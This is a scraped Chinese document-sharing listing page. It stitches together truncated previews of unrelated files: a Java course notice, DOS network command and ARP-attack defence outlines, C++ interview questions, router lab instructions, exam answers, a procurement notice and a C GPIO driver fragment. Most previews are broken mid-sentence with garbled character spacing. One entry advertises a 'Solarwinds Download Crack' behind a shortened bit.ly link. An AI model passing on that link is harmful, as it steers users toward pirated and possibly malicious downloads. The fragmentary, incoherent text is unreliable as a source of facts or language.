OOP with Java 通知 Project 2 提交时间 : 3 月 14 日晚 9 点 另一名助教 : 王桢 学习使用文本编辑器 学习使用 cmd: Power shell 阅读参考资料

OOP with Java 通知 Project 2 提交时间 : 3 月 14 日晚 9 点 另一名助教 : 王桢   学习使用文本编辑器 学习使用 cmd: Power shell 阅读参考资料 OOP with Java Yuanbin Wu cs@ecnu OOP with Java 通知 Project 2 提交时间 : 3 月 14 日晚 9 点 另一名助教 : 王桢 Email: 51141201063@ecnu.cn 学习使用文本编辑器 学习使用 cmd: Power shell 阅读参考资料 OOP with Java Java 类型 引用 不可变类型 对象存储位置 作用域 OOP

More information

DOS下常用的网络命令.PDF

DOS下常用的网络命令.PDF DOS .... 1.1... 1.2... DOS... 2.1 ARP... 2.2 Finger... 2.3 Ftp... 2.4 Nbtstat... 2.5 Netstat... 2.6 Ping... 2.7 Rcp... 2.8 Rexec... 2.9 Route... 2.10 Rsh... 2.11 Tftp... 2.12 Tracert... 1 1 1 1 1 2 3 4

More information

SEC-220

SEC-220 Session CERT/CC 60000 50000 40000 52,658 30000 26,829 20000 10000 0 2,412 1995 1999 2000 2001 Q1, 2002 Source: http://www.cert.org/stats/ CERT/CC 3000 2500 2000 2,437 1500 1000 500 0 171 1,065 1995

More information

安友医疗科技(武汉)有限责任公司

安友医疗科技(武汉)有限责任公司 武 汉 楚 才 云 科 技 有 限 公 司 武 汉 楚 才 云 科 技 有 限 公 司 成 立 于 2015 年 3 月, 主 营 方 向 为 面 向 K12 的 线 上 线 下 互 动 教 育 信 息 服 务 平 台, 主 营 产 品 包 括 新 国 学 教 育 O2O 托 管 服 务 免 费 家 校 通 在 线 作 业 辅 导 及 家 教 推 介 基 于 地 理 位 置 的 培 优 辅 导 教

More information

ARP?? b.doc

ARP?? b.doc 预防和处理 ARP 攻击病毒 1 前言 : 病毒原理和行为说明...2 2 预防在先, 重要的规避措施...4 3 第一步, 监控攻击行为和源头...4 2.1. 第三方 IDS 或者有 IDS 功能的防火墙...4 2.2. 第三方工具...4 2.3. 趋势 OfficeScan 客户端防火墙...7 4 第二步, 恢复网络...7 5 第三步, 分析并提取 ARP 攻击源可疑样本...7 此文档的位置

More information

提问袁小兵:

提问袁小兵: C++ 面 试 试 题 汇 总 柯 贤 富 管 理 软 件 需 求 分 析 篇 1. STL 类 模 板 标 准 库 中 容 器 和 算 法 这 部 分 一 般 称 为 标 准 模 板 库 2. 为 什 么 定 义 虚 的 析 构 函 数? 避 免 内 存 问 题, 当 你 可 能 通 过 基 类 指 针 删 除 派 生 类 对 象 时 必 须 保 证 基 类 析 构 函 数 为 虚 函 数 3.

More information

Ip Network Browser Solarwinds Download Crack. Tienda stress diesel generar Egypt acceso

Ip Network Browser Solarwinds Download Crack. Tienda stress diesel generar Egypt acceso Ip Network Browser Solarwinds Download Crack ->>->>->> http://bit.ly/2hdnj7a 1 / 5 2 / 5 none SolarWinds( 里诺下载站提供 ) 是一款网络安全管理软件, 可以监控, 发现网络设备, 使用简单... 和 IP 网络浏览器 (IPNetworkBrowser) DNS 核查 (DN SAudit) IP

More information

计算机网络 实验指导书 / 实验三 : 使用路由器组网 实验三 : 使用路由器组网 一 实验目的 1 理解路由器的基本工作原理; 2 掌握路由器的基本管理和配置方法; 3 理解路由组网的方法和静态路由的具体使用; 4 理解基于路由器的园区网的结构, 并进一步体会园区网的设计思路 二 实验学时 2 学

计算机网络 实验指导书 / 实验三 : 使用路由器组网 实验三 : 使用路由器组网 一 实验目的 1 理解路由器的基本工作原理; 2 掌握路由器的基本管理和配置方法; 3 理解路由组网的方法和静态路由的具体使用; 4 理解基于路由器的园区网的结构, 并进一步体会园区网的设计思路 二 实验学时 2 学 实验三 : 使用路由器组网 一 实验目的 1 理解路由器的基本工作原理; 2 掌握路由器的基本管理和配置方法; 3 理解路由组网的方法和静态路由的具体使用; 4 理解基于路由器的园区网的结构, 并进一步体会园区网的设计思路 二 实验学时 2 学时 三 实验类型 综合性 四 实验需求 1 硬件每人配备计算机 1 台 2 软件 Windows 7 以上操作系统, 安装 GNS3 网络仿真与 VirtualBox

More information

网工新答案

网工新答案 2005 年 5 月 29 日 软 考 2005 年 上 半 年 网 络 工 程 师 上 午 试 题 ( 参 考 答 案 ) ( 特 别 声 明, 此 答 案 只 作 参 考 ) 本 文 是 经 过 三 审 后 的 CIU 网 工 上 午 参 考 答 案 ( 正 确 率 在 92%-95% 之 间, 因 为 种 种 原 因, 不 能 与 标 准 答 案 完 全 相 同, 请 大 家 理 解 ) 如

More information

湖北省政府采购中心

湖北省政府采购中心 湖 北 省 省 级 政 府 采 购 招 标 文 件 项 目 编 号 :EZC-2014-ZX1026 项 目 名 称 : 湖 北 省 测 绘 成 果 档 案 馆 测 绘 服 务 云 平 台 配 套 设 备 购 置 招 标 内 容 : 五 台 精 密 空 调 两 台 核 心 交 换 设 备 一 台 上 网 行 为 管 理 设 备 一 台 安 全 VPN 设 备 湖 北 省 政 府 采 购 中 心 二

More information

课程编号 :B Linux 程序设计 实验报告 姓名薛旗学号 班级软信 指导教师王学毅 实验名称多进程编程 开设学期 第一学期 开设时间第 18 周 第 19 周 报告日期 201

课程编号 :B Linux 程序设计 实验报告 姓名薛旗学号 班级软信 指导教师王学毅 实验名称多进程编程 开设学期 第一学期   开设时间第 18 周 第 19 周 报告日期 201 课程编号 :B080203060 Linux 程序设计 实验报告 姓名薛旗学号 2 0 1 5 5 3 6 2 班级软信 - 1 5 0 3 指导教师王学毅 实验名称多进程编程 开设学期 2017-2018 第一学期 开设时间第 18 周 第 19 周 报告日期 2018 年 1 月 8 日 评定成绩 评定人王学毅评定日期 2018 年 1 月 12 日 东北大学软件学院 一 实验目的 实验一多进程编程

More information

(Microsoft Word - NCRE\314\345\317\265\265\367\325\37313\324\27221\272\3051.doc)

(Microsoft Word - NCRE\314\345\317\265\265\367\325\37313\324\27221\272\3051.doc) 川 教 考 院 2013 21 号 全 国 计 算 机 等 级 考 试 调 整 方 案 2011 年 7 月, 教 育 部 考 试 中 心 组 织 召 开 了 第 五 届 全 国 计 算 机 等 级 考 试 NCRE 考 委 会 会 议, 会 议 完 成 NCRE 考 委 会 换 届 选 举, 并 确 定 了 下 一 步 改 革 和 发 展 的 目 标 在 新 的 历 史 时 期,NCRE 将 以

More information

static struct file_operations gpio_ctl_fops={ ioctl: gpio_ctl_ioctl, open : gpio_open, release: gpio_release, ; #defineled1_on() (GPBDAT &= ~0x1) #def

static struct file_operations gpio_ctl_fops={ ioctl: gpio_ctl_ioctl, open : gpio_open, release: gpio_release, ; #defineled1_on() (GPBDAT &= ~0x1) #def Kaise s 2410 Board setting [1]. Device Driver Device Driver Linux s Kernel ARM s kernel s3c2410_kernel2.4.18_r1.1_change.tar.bz2 /usr/src (1) #cd /usr/src (2) #tar xfj s3c2410_kernel2.4.18_r1.1_change.tar.bz2

More information

90 1 2/3 2/

90 1 2/3 2/ ( ) 2004 6 90 1 2/3 2/3 00 01 02 03 01 02 02 2 2 26 + = 21.72 Internet DDN 5 + + = 2000 559.11 3 01 4 3 4 7 5 5 5 3 1 02, 03 2 4 3 1 00 00 5 01 02 03 2 ---> ---> ---> - --> ------ 6 BBS 3 01 PowerPoint

More information

一、选择题

一、选择题 计 算 机 网 络 基 础 第 7 章 练 习 思 考 与 认 识 活 动 一 选 择 题 1. 下 面 命 令 中, 用 于 检 查 WINDOWS2000 下 TCP/IP 配 置 信 息 的 是 ( ) A. cmd B. nslookup C. ipconfig D. ping 2. 内 部 网 关 协 议 RIP 是 一 种 广 泛 使 用 的 基 于 距 离 矢 量 算 法 的 协 议

More information

中北大学常规事项财务报销操作指南

中北大学常规事项财务报销操作指南 中 北 大 学 常 规 事 项 财 务 报 销 操 作 指 南 一 办 公 费 报 销 指 南 定 义 : 办 公 费 是 单 位 购 买 按 财 务 会 计 制 度 规 定 不 符 合 固 定 资 产 标 准 的 日 常 办 公 用 品 书 报 杂 志 等 支 出 通 俗 讲 是 指 办 公 场 所 使 用 的 低 值 易 耗 品 办 公 用 品 的 类 别 : 纸 薄 类 笔 尺 类 装 订 类

More information